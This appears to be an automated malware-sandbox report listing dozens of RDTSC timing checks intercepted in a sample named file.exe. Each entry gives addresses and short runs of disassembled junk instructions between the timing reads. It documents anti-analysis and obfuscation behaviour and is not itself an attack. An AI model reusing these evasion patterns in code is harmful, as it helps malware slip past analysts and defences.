                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6004C second address: F60070 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD4A4C546A7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F60070 second address: F60074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5ECFE second address: F5ED1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5ED1D second address: F5ED23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5ED23 second address: F5ED29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5ED29 second address: F5ED2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5EFDF second address: F5EFE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5EFE5 second address: F5EFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F15E second address: F5F162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F162 second address: F5F182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD4A4ED8673h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F182 second address: F5F188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F188 second address: F5F192 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD4A4ED8666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F192 second address: F5F1B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A5h 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FD4A4C54696h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F1B1 second address: F5F1B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F595 second address: F5F5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4A4C5469Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F5A5 second address: F5F5A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F5A9 second address: F5F5AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F5AF second address: F5F5EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD4A4ED866Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 jg 00007FD4A4ED8695h 0x00000017 jo 00007FD4A4ED866Ah 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f push edx 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD4A4ED8679h 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F5EB second address: F5F5EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F9DF second address: F5F9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD4A4ED8668h 0x0000000a popad 0x0000000b js 00007FD4A4ED8686h 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007FD4A4ED8666h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5F9FA second address: F5FA08 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FD4A4C546A2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FED1 second address: F5FEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 jmp 00007FD4A4ED8670h 0x0000000e popad 0x0000000f pushad 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FEF4 second address: F5FF08 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jp 00007FD4A4C54696h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FD4A4C54696h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5FF08 second address: F5FF0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65BD9 second address: F65BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F686AC second address: F686B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F686B1 second address: F686B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EAF6 second address: F6EAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EAFF second address: F6EB05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EB05 second address: F6EB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EB0F second address: F6EB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4A4C5469Bh 0x00000009 jnc 00007FD4A4C54696h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EB2B second address: F6EB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EB2F second address: F6EB33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EB33 second address: F6EB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4A4ED8679h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EB58 second address: F6EB91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A2h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FD4A4C546A8h 0x00000011 jo 00007FD4A4C54696h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E26B second address: F6E272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E272 second address: F6E278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E278 second address: F6E27E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E543 second address: F6E55D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push edx 0x00000007 jmp 00007FD4A4C546A1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E7BE second address: F6E7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E7C4 second address: F6E7CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E7CD second address: F6E7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4A4ED8679h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E7EA second address: F6E804 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E804 second address: F6E825 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD4A4ED8672h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E825 second address: F6E829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E829 second address: F6E83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007FD4A4ED8666h 0x00000011 pop ebx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7295F second address: F72972 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD4A4C54696h 0x00000008 jo 00007FD4A4C54696h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED2ED9 second address: ED2EEC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FD4A4ED866Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F71DC4 second address: F71DCE instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD4A4C5469Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F71F2C second address: F71F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F71F30 second address: F71F34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F71F34 second address: F71F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F71F3A second address: F71F5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007FD4A4C54696h 0x0000000b jns 00007FD4A4C54696h 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007FD4A4C5469Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7209F second address: F720B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FD4A4ED866Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F72261 second address: F72267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F72267 second address: F7226B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F76D2F second address: F76D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 jne 00007FD4A4C546AAh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F76D54 second address: F76D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F76D58 second address: F76D5E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F76E8F second address: F76E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F76E93 second address: F76ECE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FD4A4C54696h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD4A4C546A4h 0x00000011 jp 00007FD4A4C5469Eh 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jbe 00007FD4A4C54696h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F76ECE second address: F76ED8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F76ED8 second address: F76EDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F76EDC second address: F76EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F76EE4 second address: F76F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4C546A6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77066 second address: F77070 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD4A4ED8666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77070 second address: F77076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77076 second address: F7707A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2346B second address: F234D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jnp 00007FD4A4C5469Ah 0x0000000c nop 0x0000000d mov cl, F2h 0x0000000f sbb edx, 7A998112h 0x00000015 mov ebx, dword ptr [ebp+124975C7h] 0x0000001b movzx edx, cx 0x0000001e add eax, ebx 0x00000020 or edx, dword ptr [ebp+122D304Ch] 0x00000026 push eax 0x00000027 jmp 00007FD4A4C5469Ch 0x0000002c mov dword ptr [esp], eax 0x0000002f mov edi, 6C6A0996h 0x00000034 push 00000004h 0x00000036 jc 00007FD4A4C54696h 0x0000003c mov dword ptr [ebp+122D2D24h], ecx 0x00000042 nop 0x00000043 jnp 00007FD4A4C5469Eh 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FD4A4C5469Bh 0x00000051 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F777CD second address: F777E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 jns 00007FD4A4ED8666h 0x0000000c jmp 00007FD4A4ED866Bh 0x00000011 pop ebx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F80476 second address: F80487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FD4A4C54696h 0x00000009 jo 00007FD4A4C54696h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC408 second address: ECC426 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FD4A4ED8670h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FD4A4ED8666h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ECC426 second address: ECC42A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E643 second address: F7E671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FD4A4ED866Dh 0x0000000d popad 0x0000000e jmp 00007FD4A4ED8678h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7F06C second address: F7F070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7F5D8 second address: F7F5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD4A4ED8666h 0x0000000a jo 00007FD4A4ED8666h 0x00000010 popad 0x00000011 jl 00007FD4A4ED866Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7F8E2 second address: F7F8EC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD4A4C54696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7FBCE second address: F7FBDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4ED866Ah 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7FBDC second address: F7FBF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7FEB9 second address: F7FEC3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F80152 second address: F80156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88B1F second address: F88B47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED866Fh 0x00000007 jmp 00007FD4A4ED8675h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88B47 second address: F88B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4C546A3h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F90174 second address: F90183 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD4A4ED866Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F90183 second address: F901A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 je 00007FD4A4C546A6h 0x0000000e jmp 00007FD4A4C5469Eh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnl 00007FD4A4C54696h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F91255 second address: F91259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F91259 second address: F91265 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD4A4C54696h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F185 second address: F8F18F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9922C second address: F99244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4A4C546A4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED6526 second address: ED6535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4A4ED866Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA4CB1 second address: FA4CB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA4CB6 second address: FA4CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7573 second address: FA7586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4C5469Dh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7586 second address: FA758C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB30F second address: FAB331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB331 second address: FAB34C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FD4A4ED8670h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB34C second address: FAB357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB357 second address: FAB35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB35B second address: FAB35F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
